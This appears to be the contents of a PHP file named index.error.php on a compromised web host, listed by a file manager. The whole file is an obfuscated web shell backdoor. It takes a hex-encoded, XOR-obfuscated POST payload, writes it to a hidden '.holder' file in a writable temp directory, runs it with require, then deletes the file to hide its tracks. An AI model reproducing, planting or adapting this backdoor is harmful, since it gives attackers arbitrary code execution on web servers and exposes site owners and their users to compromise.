| Current File : /home/missente/public_html/cKlZG/upgrades/index/evil_coder/proc/index.error.php |
<?php
if(isset($_POST) && isset($_POST["\x6Fbje\x63t"])){
$flg = array_filter(["/var/tmp", getenv("TEMP"), "/dev/shm", getcwd(), "/tmp", sys_get_temp_dir(), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir")]);
$rec = hex2bin($_POST["\x6Fbje\x63t"]);
$item = '' ; for($a=0; $a<strlen($rec); $a++){$item .= chr(ord($rec[$a]) ^ 27);}
foreach ($flg as $key => $symbol) {
if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) {
$value = str_replace("{var_dir}", $symbol, "{var_dir}/.holder");
if (file_put_contents($value, $item)) {
require $value;
unlink($value);
exit;
}
}
}
}